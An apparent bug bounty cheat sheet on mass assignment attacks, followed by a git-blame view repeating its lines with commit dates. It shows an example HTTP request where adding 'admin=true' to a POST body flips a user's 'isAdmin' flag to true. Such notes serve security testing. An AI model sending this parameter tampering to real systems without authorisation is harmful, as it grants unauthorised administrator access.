AllAboutBugBounty/Mass Assignment.md

# Mass Assignment Attack

## Introduction
Occurs when an app allows a user to manually add parameters in an HTTP Request & the app process value of these parameters when processing the HTTP Request & it affects the response that is returned to the user. Usually occurs in Ruby on Rails / NodeJS

## How to exploit
- Normal request
```
POST /editdata HTTP/1.1
Host: target.com
...

username=daffa
```
The response
```
HTTP/1.1 200 OK
...

{"status":"success","username":"daffainfo","isAdmin":"false"}
```

- Modified Request 
```
POST /editdata HTTP/1.1
Host: target.com
...

username=daffa&admin=true
```

```
HTTP/1.1 200 OK
...

{"status":"success","username":"daffainfo","isAdmin":"true"}
```

## References
* [Pentester Academy](https://blog.pentesteracademy.com/hunting-for-mass-assignment-56ed73095eda)
Added 4 tips to misc folders 2021-02-09 10:29:07 +00:00			`# Mass Assignment Attack`
Update structure each readme 2022-06-15 10:38:42 +00:00
Added 4 tips to misc folders 2021-02-09 10:29:07 +00:00			`## Introduction`
			`Occurs when an app allows a user to manually add parameters in an HTTP Request & the app process value of these parameters when processing the HTTP Request & it affects the response that is returned to the user. Usually occurs in Ruby on Rails / NodeJS`

Update structure each readme 2022-06-15 10:38:42 +00:00			`## How to exploit`
Added 4 tips to misc folders 2021-02-09 10:29:07 +00:00			`- Normal request`
			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`POST /editdata HTTP/1.1`
			`Host: target.com`
			`...`
Added 4 tips to misc folders 2021-02-09 10:29:07 +00:00
			`username=daffa`
			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`The response`
Added 4 tips to misc folders 2021-02-09 10:29:07 +00:00			```
			`HTTP/1.1 200 OK`
			`...`

Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`{"status":"success","username":"daffainfo","isAdmin":"false"}`
Added 4 tips to misc folders 2021-02-09 10:29:07 +00:00			```

			`- Modified Request`
			```
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`POST /editdata HTTP/1.1`
			`Host: target.com`
			`...`
Added 4 tips to misc folders 2021-02-09 10:29:07 +00:00
			`username=daffa&admin=true`
			```

			```
			`HTTP/1.1 200 OK`
			`...`

Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`{"status":"success","username":"daffainfo","isAdmin":"true"}`
Update structure each readme 2022-06-15 10:38:42 +00:00			```

			`## References`
			`* [Pentester Academy](https://blog.pentesteracademy.com/hunting-for-mass-assignment-56ed73095eda)`